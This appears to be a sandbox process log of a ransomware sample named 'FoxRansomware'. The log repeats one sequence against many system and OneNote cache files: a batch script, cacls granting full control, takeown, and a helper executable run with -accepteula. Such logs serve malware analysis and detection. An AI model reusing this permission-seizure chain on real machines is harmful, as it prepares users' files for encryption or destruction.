C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:5664
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:7832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:7524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "tasks.xml" -nobanner3⤵PID:7516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "tasks.xml" -nobanner4⤵PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:4048
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:7624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Modifies file permissions
PID:7932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "behavior.xml" -nobanner3⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "behavior.xml" -nobanner4⤵PID:7668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""2⤵PID:7596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C3⤵PID:7928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"3⤵
- Modifies file permissions
PID:7880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000009.bin" -nobanner3⤵PID:7252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000009.bin" -nobanner4⤵PID:7920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""2⤵PID:7444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C3⤵PID:8172
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"3⤵PID:7520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000N.bin" -nobanner3⤵PID:7616
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000N.bin" -nobanner4⤵PID:7888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""2⤵PID:6836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C3⤵PID:7956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"3⤵PID:8144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000011.bin" -nobanner3⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000011.bin" -nobanner4⤵PID:8148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:5436
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:8176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:5816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:5820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:8064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:6020
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:8092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:2804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:1548
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:5996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵PID:2068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:4948
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:4476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵
- Modifies file permissions
PID:3016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:4284
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:64
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:1228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵PID:7040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""2⤵PID:3744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C3⤵PID:5888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"3⤵PID:5736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006D.bin" -nobanner3⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006D.bin" -nobanner4⤵PID:2196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""2⤵PID:5680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C3⤵PID:4028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"3⤵PID:6632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006N.bin" -nobanner3⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006N.bin" -nobanner4⤵PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:1748
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:3784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:4148
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:6368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵PID:6312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:6440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:7136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:2220
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:6460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:5212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:6488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:6380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:7256
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:5176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""2⤵PID:6320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"3⤵PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007V.bin" -nobanner3⤵PID:296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007V.bin" -nobanner4⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""2⤵PID:5408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C3⤵PID:7916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"3⤵PID:6468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000089.bin" -nobanner3⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000089.bin" -nobanner4⤵PID:5532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""2⤵PID:988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C3⤵PID:7084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"3⤵
- Modifies file permissions
PID:7076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009B.bin" -nobanner3⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009B.bin" -nobanner4⤵PID:7492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""2⤵PID:7068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C3⤵PID:6812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"3⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009L.bin" -nobanner3⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009L.bin" -nobanner4⤵PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C3⤵PID:3580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"3⤵PID:6784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A6.bin" -nobanner3⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A6.bin" -nobanner4⤵PID:5792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""2⤵PID:7336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C3⤵PID:5616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"3⤵PID:6284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AH.bin" -nobanner3⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AH.bin" -nobanner4⤵PID:3052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""2⤵PID:7768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C3⤵PID:7672
-
-
    C:\Windows\SysWOW64\takeown.exe [PID 7188] [Modifies file permissions]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 3144]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B7.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7516]  fjPLyeD8.exe -accepteula "000000B7.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7840]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5844]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl""
    C:\Windows\SysWOW64\cacls.exe [PID 7052]  cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5644]  takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl"
    C:\Windows\SysWOW64\cmd.exe [PID 7416]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 8028]  fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6880]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7608]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl""
    C:\Windows\SysWOW64\cacls.exe [PID 1608]  cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7876]  takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl"
    C:\Windows\SysWOW64\cmd.exe [PID 7580]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 2292]  fjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 1952]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7756]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
